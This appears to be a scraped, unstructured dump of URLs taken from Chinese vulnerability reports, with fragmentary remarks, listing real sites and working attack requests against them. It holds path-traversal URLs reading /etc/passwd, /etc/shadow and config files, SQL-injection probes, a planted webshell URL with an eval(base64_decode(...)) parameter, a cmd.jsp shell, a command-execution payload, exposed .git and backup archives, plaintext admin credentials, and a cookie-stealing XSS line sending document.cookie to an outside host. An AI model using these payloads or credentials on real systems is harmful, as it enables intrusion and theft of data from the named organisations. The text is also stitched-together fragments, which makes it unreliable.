http://v.higo.meilishuo.com:80/buyer/get_main_page?access_token=223876f4bf98816290ffff64474f4770&app=higo&backup=2&client_id=1&cver=3.5&device_id=oudid_0b6f98968dbc3b8110a6e29b7b546714e7d07f0c&device_token=&idfa=E623A16D-A9F6-4D7C-BBF7-79C6A86CC151&open_udid=0b6f98968dbc3b8110a6e29b7b546714e7d07f0c&qudaoid=10000&user_id=176552149796180000&uuid=2db9ac1253de8a1c86c2e9eb04cbe075&ver=0.8&via=iphone http://e-insure.cninsure.net/cms/wwwroot/dzswwz/sy/index.shtml http://crewinternal.juneyaoair.com:65/logout http://**.**.**.**/tyzh-jjty-ssxx/article.jsp?articleId=34608 http://**.**.**.**/fuwu1.php?fid=23 http://**.**.**.**/InfoPublish/CategoryViewNormal.aspx?child=130&parent=129&CategoryName= http://**.**.**.**/infobidding/detailNewsAction.do?infoId=79358&isfile=2 http://**.**.**.**/infobidding/bak.jsp jdbc:oracle:thin:@**.**.**.**:1521:infodb jdbc:sqlserver**.**.**.**:1433;SelectMethod=Cursor;DatabaseName=anjy jdbc:sqlserver**.**.**.**:1433;SelectMethod=Cursor;DatabaseName=cjinfo http://**.**.**.**/infobidding/mytesttest.jsp http://ldj.jiangmen.gov.cn:8089/ http://ldj.jiangmen.gov.cn:8089/CheckProcess.aspx http://m.multigold.com.cn http://xmlso.mumayi.com/v18/nodownload.php http://114.255.29.207/clpccd/人寿无线终端出单管理系统 http://i.mooc.chaoxing.com http://m.zol.com.cn/查看更多评论处,ajax包存在sql注入漏洞 http://www.tsinghua.org.cn/alumni/communityclient/listFormerAddress.do?groupId=3 http://www.tsinghua.org.cn/alumni/communityclient/listFormerAddress.do?groupId=2473 http://**.**.**.**/fs/portal/index.do存在struts2-019漏洞,经过检查,发现已被入侵,可通过http://**.**.**.**/xxxx.jsp访问 http://www.multigold.com.cn/ http://**.**.**.**/manage/Login.aspx http://www.028tjw.com http://**.**.**.**/tools/login.ashx http://**.**.**.**/ http://blog.deepin.org/.wp-config.php.swp”,内含数据库连接信息, http://blog.deepin.org/.git/index",这里面有他们自己做的wp主题,deepin2015。。感兴趣的可以找我要,, http://www.sinoflt.com/swpx/indexActivity_activityInfo.action?activity.id=202 http://special.ifensi.com/admin/index http://special.ifensi.com/admin/comment/index?uname=&info=&targetid=213&search=%E6%90%9C%E7%B4%A2 http://**.**.**.**/dispword.jsp?sysno=31796 http://www.qfkd.com.cn/setqfkd/login.aspx http://www.tjwfn.com/net_list.jsp?ieb12eki&zxlb=1'%22 http://dckf.digitalchina.com/index.php/point/checkuser http://dckf.digitalchina.com/helP.php http://oldmail.hailiang.com/ http://mail.hailiang.com/ http://www.lcsysu.com/news_ser.php?lm=4%27&keyword=1 http://www.lcsysu.com/news_ser.php?lm=4&keyword http://sqlmap.org https://github.com/puppyred/manyi/blob/c4c92f4dde1671027ff726ba6bbe6021421cd469/trunk/hims/resource/META-INF/hims.properties http://csc.zte.com.cn/csc/helpdesk.aspx?eccLanguage=English&logon=first&fromStr=eccindex&systemName=ECC1&employeeNum=10057782 http://www.tiancity.com/homepage/ http://dev.qa.tsiv1.mtiancity.com/ http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3in1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://**.**.**.**/inedu3in1/index.aspx http://**.**.**.**/IneduPortal/index.aspx http://**.**.**.**/Inedu3In1/index.aspx http://nan.yiban.shikee.com/list-1.html?cate=2245 http://www.shuomogu.com/ http://www.xoyin.com/ http://www.zhongxunrc.com/ http://www.job168.com/channel/gzjz/list.jsp?board=%B9%A4%D7%F7%B6%AF%CC%AC http://**.**.**.**/ http://**.**.**.**/DBMS/Purview/HoldManage/Operation.aspx?KeyWord=2460004&HoldID=0 http://www.codoon.com/regist)使用手机号码注册、未验证发送的手机校验码,导致任意手机号码可被注册。 http://211.151.247.132/ http://211.151.247.132/Users/Login.aspx http://dellcity.dell-brand.com:80/ http://advisor.dell-brand.com/index.php?a=search&cid=1&m=solution&sid=6&wd=e http://crm.gsm.pku.edu.cn/console/ system:password http://**.**.**.**:8181/Login.aspx?ReturnUrl=%2fmain.aspx http://**.**.**.**:7070/ http://**.**.**.**:8090/ http://mailserver.juneyao.com/ http://www.10086sxcc.com/ cop.quyiyuan.com/APP http://180.153.191.147:8088/cluster http://180.153.191.147:50090/status.jsp http://180.153.191.147:50090/logs/ http://180.153.191.147:50070/dfshealth.html#tab-overview http://wooyun.org/bugs/wooyun-2010-099979 http://**.**.**.**/manage/Admin_Login.aspx http://gotohuawei.com:80/index.php/Info/view/pid/1* https://www.anpingdai.com/.git/config http://qydev.weixin.qq.com/qa/ http://yimin.edai.com/manager/cx/index.php http://**.**.**.**/cms/cmsadmin/ad/openad.jsp?adid=1424429306068870 http://**.**.**.**/cms/ad/openad.jsp?adid=1423104043281385 http://**.**.**.**/cms/ad/openad.jsp?adid=1188349051997680 http://**.**.**.**/cms/cmsadmin/ad/openad.jsp?adid=1406884610672046 http://**.**.**.**/cms/ad/openad.jsp?adid=1234421225968327 http://m.caijing.com.cn/.svn/entries http://**.**.**.**/wwwroot.zip http://mpartner.funshion.com/login/index.php?c=login&a=login&so=begin http://www.made-in-china.com/aboutus/contact/ http://vip.cofco.com:8080/zlshop/ http://vip.cofco.com:8080/zlshop.zip http://hjss.vpclub.cn/ http://hjss.vpclub.cn:8087/ http://hjss.vpclub.cn/Config/DBConfig/DBconfig.xml http://223.223.203.210:7001 http://**.**.**/login.php http://vrms.train.tujia.com/login http://lib.haut.edu.cn/ArticleList.aspx?SectionId=1b98f31b-5261-4a77-b07e-9f01fcb25212 http://lib.haut.edu.cn/ActicleShow.aspx?SectionId=1b98f31b-5261-4a77-b07e-9f01fcb25212 http://**.**.**.**/Egh/Hall/SearchResult.aspx?ApplyUserCodeId=1 http://mailserver.handhand.net:7002/recordings/index.php?logout=1 http://mailserver.handhand.net:7002/web-meetme/meetme_control.php http://mailserver.handhand.net:7002/web-meetme/meetme_control.php http://eyemain.znv.com/wq/login.action http://eyemain.znv.com http://money.crtrust.com:7001/etrading/etrading.jsp http://qgzx.hebtu.edu.cn/view_gwxwxx.asp?id=72 http://qgzx.hebtu.edu.cn/view_gwxwxx.asp?id=72 http://qgzx.hebtu.edu.cn/view_gwxwxx.asp?id=72 http://qgzx.hebtu.edu.cn/admin/admin.asp http://my.caihongtang.com/tuya.php?gameid=6862 http://us.made-in-china.com/ http://**.**.**.**/resourcebank/login/Jeecms.do http://**.**.**.**/portal/auth/loginPageHB.do)和http://www.gdedu.tv/中都通用。 http://**.**.**.**/ajax.aspx?cdate=8&classID=1&netip=**.**.**.**&oper=ajaxScanIP http://**.**.**.**//iframe/default.aspx?ChannelId=22 http://**.**.**.**//iframe/default.aspx?ChannelId=22 http://**.**.**.**//iframe/default.aspx?ChannelId=22 http://**.**.**.**:80//iframe/index_mtjj.aspx POST:hdChannelID=2 http://**.**.**.**//iframe/index_tgfs.aspx?ClassID=1%20and%201=1&page=1 http://**.**.**.**//iframe/list.aspx?channelid=21/**/AND/**/129%3d129&classid=111&date=2014/6/1%200:00:00&date2= http://www.webpowerchina.com/admin_login.php http://bid.powerec.net/ http://**.**.**.**/outstu/ http://wooyun.org/bugs/wooyun-2015-0129971 http://**.**.**.**/bugs/wooyun-2010-0118149 http://**.**.**.**/bugs/wooyun-2010-0118136 http://bnsdb.games.sina.com.cn/grocery/index?page=3&quality[0]=2&type[0]=1 http://pinggu.renrenche.com/index.php?m=get_model_price&model_id=4147®ister_time=2015-05&mile=1&token=TYZKELbm&city=119 https://121.40.77.95/.git/ http://121.40.77.95:8090/.git/ http://121.40.77.95:8008/.git/ http://cacti.payegis.com.cn/ payegis:payegis http://202.108.145.241:8080/ http://**.**.**.**/dtwz/mail/mail_login.html http://s.lakala.com/ http://**.**.**.**/info_show.php?id=757 http://m.trjcn.com/login/forget.html http://zabbix.cjdao.cn https://www.anpingdai.com/ http://wooyun.org/bugs/wooyun-2015-0131369 http://sso.hc360.com/security/VerifyMobile.html?returnurl=http%3A%2F%2Fxt.hc360.com%2Findex.php www.hc360.com进入主站页面,可以以当前的身份访问所有业务。 http://sso.hc360.com/VerifyMobile.jsp?loginid=admin&mobile=151马赛克41&validKey=7757&ctoken=500b7c25-7af7-4311-95b5-c305e635595d&returnurl=http://bbs.hc360.com&callback=jQuery16208473089167382568_1441721219340&_=1441721250974 http://y1s.cn http://www.kmw1.com http://ceshi.kmw1.com/.svn/entries http://hq.sicnu.edu.cn/home/Markbrow?ID=799 http://hq.sicnu.edu.cn/log.txt http://**.**.**.**:9085/mobile/plugin/loadWfGraph.jsp?workflowid=1&requestid=1* http://www.jdsxy.com/ http://www.jdsxy.com/app/account/findPassword/MTUzNjA3IzIwMTUtMDktMDkgMTM6MDU6MDA= http://www.jdsxy.com/app/account/findPassword/153607#2015-09-09 http://www.jdsxy.com/app/account/findPassword/MTUzNjA3IzIwMTUtMDktMDkgMTM6MDU6MDA= http://www.vjianke.com/api/ad/get?callback=jQuery16206296576291788369_1441764661807&format=json&ownerguid=8b6257c9505548febabc9eec005a94d2&platform=0&ClipId=ZLJUT&_=1441764661981 http://**.**.**.**/db.rar http://**.**.**.**/line/query.do?prno=1 http://**.**.**.**/line/query.do?prno=1 http://**.**.**.**/line/query.do?prno=391 http://**.**.**.**/line/query.do?prno=19 http://**.**.**.**/line/query.do?prno=1 http://**.**.**.**/bugs/wooyun-2015-0139789/trace/17da959cabfccc1a28ded8846f9c749c http://mp.weixin.qq.com/mp/redirect?url=http://www.baidu.com http://**.**.**.**/ http://**.**.**.**/cgi/ http://**.**.**.**/Chinese/vpn/ http://**.**.**.**/Chinese/manage/ http://**.**.**.**/webmail/user/ http://**.**.**.**/chinese/mien/images/ http://**.**.**.**/webmail/user/user.rar http://**.**.**.**/Chinese/List.asp?Id=5005 http://www.luanhq.com/GJJCX/admin/adminlogin.aspx http://www.cjdao.com/index.html http://**.**.**.**:8080/heeroa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/ctbuoa//infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1 http://**.**.**.**/oa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/oa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/oa/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1&filters= http://**.**.**.**/oa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**/heeroa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**/sqoa//faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**/swpuoa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://**.**.**.**:8080/heeroa/faWenAction.do?step=toRead&readFile.id=&readFile.fileId=../../../../../../../../../etc/passwd&readFile.type=txt http://2014.dfzq.com.cn/dfzq.tar.gz http://**.**.**.**:7001/index.jsp http://**.**.**.**:7001/indoc-cost.jsp?page=1&BH=01&MC=A http://**.**.**.**:7001/inhos-cost.jsp?page=1&BH=&MC=a http://**.**.**.**:7001/ylmedicine-price.jsp?bid=3&mid=15&id=3401 http://**.**.**.**:7001/csbg.jsp?txm=1111111&name=zhang http://**.**.**.**:7001/assayResult.jsp?txm=123&name=lisi http://**.**.**.**:7001/yxbg.jsp?txm=3333333&name=wangwu http://**.**.**.**:7001/medicine-price.jsp?page=1&BH=%C3%E2%BC%E5%D6%D0%D2%A9&MC=AA http://**.**.**.**:7001/indoc-cost.jsp?page=1&BH=01&MC=A http://**.**.**.**:7001/inhos-cost.jsp?page=1&BH=&MC=a http://**.**.**.**:7001/ylmedicine-price.jsp?bid=3&mid=15&id=3401 http://**.**.**.**:7001/csbg.jsp?txm=1111111&name=zhang http://**.**.**.**:7001/assayResult.jsp?txm=123&name=lisi http://**.**.**.**:7001/yxbg.jsp?txm=3333333&name=wangwu http://**.**.**.**:7001/medicine-price.jsp?page=1&BH=%C3%E2%BC%E5%D6%D0%D2%A9&MC=AA http://219.134.242.244:9200/ http://114.247.41.56:8080/index.html http://**.**.**.**/bugs/wooyun-2010-095995】,手头关于这套系统的洞一直没有提交,今天整理下所有打包提交wooyun http://**.**.**.**/ http://**.**.**.**/news/search.php http://**.**.**.**/search.php?u=76&k=2020 http://**.**.**.**/topic/index4.php?c=109736&t=31a http://**.**.**.**/more_a1.php?p=0&c=101007 http://**.**.**.**/detail_a1.php?c=101007&i=268620a http://**.**.**.**/newsmore.php?p=0&c=101002&u=76a http://**.**.**.**/newsdetail.php?c=101002&i=269162a http://**.**.**.**/ldxx.php?p=0&c=301101&u=76a http://**.**.**.**/zwmore.php?p=0&c=300342&u=73a http://**.**.**.**/news1more.php?p=0&c=212001a&u=73 http://**.**.**.**/news2more.php?p=0&c=212080a&u=73 http://**.**.**.**/bs1more.php?p=0&c=212011&u=73a http://**.**.**.**/bs2more.php?p=0&c=212021&u=73a http://**.**.**.**/bs3more.php?p=0&c=212034&u=73a http://**.**.**.**/bs4more.php?p=0&c=212045&u=73a http://**.**.**.**/kpmore.php?p=0&c=212055&u=73a http://**.**.**.**/jlmore.php?p=0&c=101007&u=73a http://**.**.**.**/aqmore.php?p=0&c=212061&u=73a http://**.**.**.**/jjmore.php?p=0&c=201210&u=58a http://**.**.**.**/dwmore.php?p=0&c=101201&u=58a http://**.**.**.**/dwdetail.php?c=101201&i=267951a http://**.**.**.**/zsdetail.php?c=301312&i=268300a http://**.**.**.**/zwdetail.php?c=300126&i=258484a http://**.**.**.**/bugs/wooyun-2010-095995 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/search.php?u=76&k=2020 http://**.**.**.**/topic/index4.php?c=109736&t=31a http://**.**.**.**/more_a1.php?p=0&c=101007a http://**.**.**.**/detail_a1.php?c=101007&i=268620a http://**.**.**.**/newsmore.php?p=0&c=101002&u=76a http://**.**.**.**/newsdetail.php?c=101002&i=269162a http://www.job168.com:80/ www.job168.com http://app2.yihaohuoche.com:8888/ http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://app2.yihaohuoche.com:8888/wui/theme/ecology7/page/login.jsp?templateId=2 http://so.cikuu.com/.svn/entries http://jf.ztgame.com/admin/login.php http://218.28.12.113:8088/ http://image.zol.com.cn/showpicture.php3?id=1159607&type=3 http://image.zol.com.cn/showpicture.php3?id=1159607%27&type=3 http://moa.glsc.com.cn:8001/homepage.action http://www.wom186.com/ http://222.188.208.51:7001/ewac/login?_=1441798968891 http://222.188.208.51:7003/BanKloudServer/ http://222.188.208.52:7001/ecenter_hm/login http://www.kmw1.com/index.php?g=admin&m=index&a=loginpage http://www.ghhychina.cn:80/about/help/ty/ http://wzb.hebtu.edu.cn/admin/login.php http://wzb.hebtu.edu.cn/images/gundong/2015-09-08%20025058.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ== http://www.vogel.com.cn/news_view.html?id=484063 http://**.**.**.**/bugs/wooyun-2015-0139789/trace/17da959cabfccc1a28ded8846f9c749c http://**.**.**.**/Category_108/Index.aspx http://**.**.**.**:8080/nlcab/user!login.action http://kmw1.com/supplier/index.php?action=login http://www.leadong.com http://www.wooyun.org/corps/%E9%A2%86%E5%8A%A8 http://**.**.**.**/notesReport/ViewInformation.aspx?key=865 http://shanghu.manzuo.com/ http://infojiading.cn/weiweb/InfoList.asp?TParentColumnId=0000&TinforID=63 http://www.smeia.cn/ias/clt/main?fid=clt_Register&method=demo&fun=demo http://www.smeia.cn/ia/m.py?fid=private&tgt=Right&menu=private&sub1=view&upath=/../ http://www.smeia.cn/ia/main.py?fid=download&method=downfile&usr_id=demo@smeia.net&upath=/../../../../../../../../../etc/passwd http://www.smeia.cn/ia/m.py?fid=download&method=downfile&usr_id=demo@smeia.net&upath=/../../../../../../../../../var/named/ctc/master.yinfutong.com http://**.**.**.**/News_List.aspx?bid=23&sid=63 http://www.swsc.com.cn:8080//manage/upload/upload.html http://www.swsc.com.cn:8080/manage/upload/cmd.jsp http://oa.glsc.com.cn:10040/wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9QJ_89PTUFP_SEv0I_SizeGd3Rw8Tcx8DA3-jMAMDIz_T4ECD0GBjA19D_XCQZrN4AxzA0UDfD2FYQYaXBQCMXaXY/dl3/d3/L0lDUWtpQ1NTUW9LVVFBISEvb0lvZ0FFQ1FRREdJUXBURE9DNEpuQSEhLzRDd2lSLXJmbTE2SWt5WGlnRUEhLzdfQ0dBSDQ3TDAwTzJWMDAyTjVTUTBVUzMwRTQvd3BzLnBvcnRsZXRzLmxvZ2lu/ http://www.renrenle.cn/share/download.jsp?filePath=admin/upload/1342576091234.doc&fileName=1342576091234.doc http://www.renrenle.cn/share/download.jsp?filePath=../../../../../../../../../../../etc/shadow&fileName=shadow ws.war/WEB-INF/web.xml ws.war/WEB-INF/conf/app-context.xml ws.war/WEB-INF/sql.tld mpwx.war/WEB-INF/web.xml testws.war/WEB-INF/classes/conf/MallWSConfig.xml scm.war/WEB-INF/struts-config.xml scm.war/WEB-INF/classes/exportConfig.xml http://**.**.**.**/V2Conf/jsp/main/mainAction.do http://211.138.67.121:8000/spcheck/login.action http://itjuzi.com/user/edit/edit_basic_user http://www.changan-mazda.com.cn/news/index?year=2015 http://lbj.cikuu.com/ http://ks.mbachina.com/ucenter/exam/getQuesList http://1jiajie.com http://1jiajie.com/quickorder.html[下订单 http://1jiajie.com/login.html[登录 http://**.**.**.**/q_news_lt/nnq_news_list.jsp?id=b233 https://uniportal.huawei.com/uniportal/modifyInfo.do?actionFlag=toModifyPassword http://support.huawei.com/ecommunity/space/10000003 http://w3m.huawei.com/m/servlet/index?locale=zh_CN http://admin.1jiajie.com/stuff.html http://bjoffice.1jiajie.com/mrtg/203.100.81.90_eth0.html http://admin.1jiajie.com/400/d_face/l.php http://admin.1jiajie.com/400/d_face/u.html http://old.admin.1jiajie.com http://**.**.**.**/show_syfz.php?id=1301 http://blog.fund123.cn/,点击发表博文 http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191 http://f.quyiyuan.com/ http://qzlx.dlu.edu.cn/news.php?n_sel=0 http://qc.gcu.edu.cn/news_detail.asp?id=2510&bid=35&sid=42 http://qhzf.ncu.edu.cn/list.aspx?FCid=487FA71E&cid=F00514B2 http://ru.syau.edu.cn/other/n_show.asp?D_id=754 http://merchant2.ule.tom.com http://**.**.**.**/xyhdcont.php?id=5%20and%201=1 http://**.**.**.**/xyhdcont.php?id=5%20and%201=2 http://58.215.43.30 http://58.215.43.30/console/login/LoginForm.jsp http://mapi.alipay.com/gateway.do http://10.1.***31:9**0/com.guolian.esb.lifeinsurance.sms.syssendservice?wsdl http://10.6*********** http://touch.mescake.com:8082/.git/config http://card.yaic.com.cn//online/sale/card/checkAjax.do http://car.yaic.com.cn/ya/ inurl:site_item_content_2.php?site_map_item_id= http://**.**.**.**/site_item_content_2.php?site_map_item_id=361 http://**.**.**.**/ymca/site_item_content_2.php?site_map_item_id=54 http://**.**.**.**/site_item_content_2.php?site_map_item_id=414 http://**.**.**.**/huide_hosp/big5/site_item_content_2.php?site_map_item_id=24 http://**.**.**.**/site_item_content_2.php?site_map_item_id=171 http://**.**.**.**/tw/site_item_content_2.php?site_map_item_id=68 http://**.**.**.**/site_item_content_2.php?site_map_item_id=28 http://**.**.**.**/site_item_list_2.php?site_map_item_id=58 http://**.**.**.**/site_item_list_2.php?site_map_item_id=71 http://**.**.**.**/site_item_list_2.php?site_map_item_id=286 http://**.**.**.**/site_item_list_2.php?site_map_item_id=5 http://**.**.**.**/huide_hosp/big5/site_item_list_2.php?site_map_item_id=75 http://**.**.**.**/nursery/site_item_list_2.php?site_map_item_id=44 http://**.**.**.**/site_item_list_2.php?site_map_item_id=191 http://**.**.**.**/huide_hosp/big5/site_item_list_1.php?site_map_item_id=1 http://**.**.**.**/site_item_list_1.php?site_map_item_id=288 http://**.**.**.**/tw/site_item_list_1.php?topage=2&site_map_item_id=41 http://**.**.**.**/site_item_list_1.php?site_map_item_id=25 http://**.**.**.**/site_item_list_1.php?site_map_item_id=179 http://**.**.**.**/site_item_list_1.php?site_map_item_id=62 http://**.**.**.**/huide_hosp/big5/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/ymca/site_item_content_1.php?site_map_item_id=1 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/tw/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/site_item_content_1.php?site_map_item_id=95 http://**.**.**.**/nursery/site_item_list_3.php?site_map_item_id=58&list_type=2 http://**.**.**.**/huide_hosp/big5/site_item_list_3.php?site_map_item_id=58&list_type=2 http://**.**.**.**/site2/yct/web/site_item_list_3.php?site_map_item_id=19 http://**.**.**.**/site_item_list_3.php?site_map_item_id=14 http://**.**.**.**/site_item_list_3.php?site_map_item_id=2 http://**.**.**.**/site_item_list_3.php?topage=2&site_map_item_id=18 http://**.**.**.**/tcc/site_item_content_5.php?site_map_item_id=167 http://**.**.**.**/huide_hosp/big5/site_item_content_5.php?site_map_item_id=88 http://**.**.**.**/site_item_content_5.php?site_map_item_id=179 http://**.**.**.**/site_item_content_5.php?site_map_item_id=414 http://**.**.**.**/site_item_content_5.php?site_map_item_id=28 http://www.jhxy.cn:7001/defaultroot/public/select_user/search_org_list.jsp?searchName=1 http://www.lavago.com/help/baodian.jsp?columnid=404 http://www.lavago.com/tour/ListPage.jsp?fi_ProjectId=9 http://kc.taotaosou.com/mgr/addUser/list.do http://www.risun.com:8888/ http://www.risun.com:8888/adminweb/Login.asp http://www.risun.com http://www.risun.com:8888 http://www.risun.com:9999/ http://piao.yododo.com/merchant/login.ydd http://www.jac.com.cn/jac_manager/login.do http://www.huxiu.com/user/logindo http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191 http://**.**.**.**/login.jsp http://61.55.141.68/login.jsp http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=mailserver.properties&name=2.jsp&path=/../../config/ http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=config.xml&name=govexchange.properties&path=/../../config/ http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=config.xml&name=2.jsp&path=/../../config/ http://www.bbrcb.cn:7001/defaultroot/public/jsp/download.jsp?FileName=systemMark.properties&name=2.jsp&path=/../../config/ http://d.huxiu.com/ http://cgb2.fawcar.com.cn/QMDRP/qmfaces/drplogin.jsp http://css.midea.com.cn/ https://www.irongbei.com/index/alist?page=3&status=0&type=1 http://tg.feng.com/publication/publication/index_view?type_id=1&out=out http://tg.feng.com/static/kindeditor/php/file_manager_json.php?path=etc%2F&order=NAME&dir=image&1441849954812 http://222.169.184.113/ANDONSPS/ http://222.169.184.113/ascm/ http://222.169.184.113/LCDScreem/# http://hanlin.hbu.edu.cn:80/learn/asp/default.asp http://hanlin.hbu.edu.cn:80/ http://piao.yododo.com/merchant/login.ydd http://www.risun.com:8090/ http://www.risun.com:8090/adminweb/ http://**.**.**.**/NewsListShow.aspx?Pid=19 http://**.**.**.**/ShowUnits.aspx?UnitsId=20131007111013404089 http://pay.tgbus.com/interface/login.aspx?id=13 http://bbs.jjwxc.net/board.php?board=43&subid=0&page=1 http://202.121.96.144:8080/reader/login.php http://oa.china-sss.com/defaultroot/help/help_user.html http://putiancontainer.en.made-in-china.com/product/WbxQKkFuZYlC/China-Modular-Container-House-for-Labor-Accommodation.html http://**.**.**.**/html/list_594.html,在其中有管理按钮。 http://www.xj169.com http://hr.163.com:80/position/list.do?postType=01 http://hr.163.com:80/position/list.do?positionName=Java http://bbs.hongxiu.com/index.asp http://www.uhuibao.com/product/detail/?proid=79 http://www.uhuibao.com/yh/index/?aid=0&ytid=1&vid=0 http://www.uhuibao.com/ticket/result/?txtstartdate=2015-09-07&startstation=%E6%B7%B1%E5%9C%B3%E6%9C%BA%E5%9C%BA&endststion=%E5%B0%96%E6%B2%99%E5%92%80%28%E6%B5%B7%E6%B8%AF%E5%9F%8E%29 https://www.sf-ecs.com/ https://www.sf-ecs.com/security/login;jsessionid=E258DCB3D422595E9DEBE4EFE4EB944A http://doogua.dangdang.com/auth http://www.chinafair.org.cn http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=9 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=10 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=11 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=12 http://h5.31huiyi.com/xiamen/join.php?action=joiner&id=8000 http://rjcoffice.ruijie.com.cn:20140/?search=={.exec|cmd.exe http://**.**.**.**/index.php?m=emotion&type=bbs http://www.uhuibao.com http://www.uhuibao.com/user/address/?opt=del&addid=20500 http://61.144.205.109 http://61.144.205.109/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/bugs/wooyun-2010-0118453 http://**.**.**.**/bugs/wooyun-2010-0118667 http://report.fyb365.com/reporter http://www.tujia.com/UserInfo/Orderinfo/903993/ http://www.tujia.com/UserInfo/Orderinfo/903993/查看订单详情,却还在。 http://**.**.**.**/login.aspx http://**.**.**.**/LoginXYX.aspx http://**.**.**.**/ http://**.**.**.**/LoginXYX.aspx http://**.**.**.**/DBMS/LBS_Manager/AddUserInfo.aspx?holdID=131424&userID=86652 http://**.**.**.**/login.aspx http://**.**.**.**/ uid:administrator pwd:Xtx52884866 http://www.taikejie.cn/web/LOGIN/index.html http://www.logistics.foxconn.com/OutBound/TrackingManage/Truck/EX_OT_InboundTruckDeclarationDetail.aspx?LoadingNO=S150706T001&pFlag=LoadingList http://www.baifeida.com/help.php?type=39 http://house.zhuji.net/rentlb.asp?community= http://xywy.zhuji.net/yszs/expert_online.php?type=data&uid=8535076&online=0&toa=1 http://hmc.zhuji.net/cnews.aspx?classid= http://**.**.**.**/ http://**.**.**.**/user/loginAction!initIndexStatic.action http://chat.hbblxk.com:8880/register.asp?roomid=1351 country:China http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8081/invoker/JMXInvokerServlet system:type=ServerInfo http://**.**.**.**:8080/invoker/JMXInvokerServlet system:type=ServerInfo http://suguovip.suguo.com.cn/Web/index.m http://suguovip.suguo.com.cn/Web/shopResult.m?regionId=null&type=null&shopType= http://service.zbintel.com/default.asp http://update.zbintel.com http://account.pcjoy.cn/login.htm http://**.**.**.**/member/ckOrderInfo.action http://www.cncbinternational.com/ http://203.174.49.153/ http://203.174.49.153/console/login/LoginForm.jsp http://servexpress.digitalchina.com/kuwei/login.aspx http://**.**.**.**/Administrator/admin_login.aspx http://servexpress.digitalchina.com/sms/DELL/fix/fixAllInfo.asp?fix_id=C506031201 www.91huayi.com http://w.189.cn/upload/images/20150812_145525307.jsp http://**.**.**.**/defaultroot/login.jsp?localeCode=zh_CN http://oa.tianya.cn/login/Login.jsp?logintype=1 http://oa.tianya.cn/weaver/weaver.email.FileDownloadLocation?fileid=32&download=1 http://www.airmedia.net.cn/hm/stations/52df5fb90a/index.php/52e0c7480a?id=9 https://vpn.airmedia.net.cn/ http://oa.airmedia.net.cn/login/Login.jsp www.kuxun.cn http://60.28.194.185/dashboard.php http://xinhun.li/ourwedding/cms/admin.php?mod=index&act=login,点击“注册”创建新的用户; http://itjuzi.com/company/26605 http://itjuzi.com/company/26605 vascript:win dow.lo cation .href='http://www.xxx.com/cookie.asp?msg='+do cument.co okie 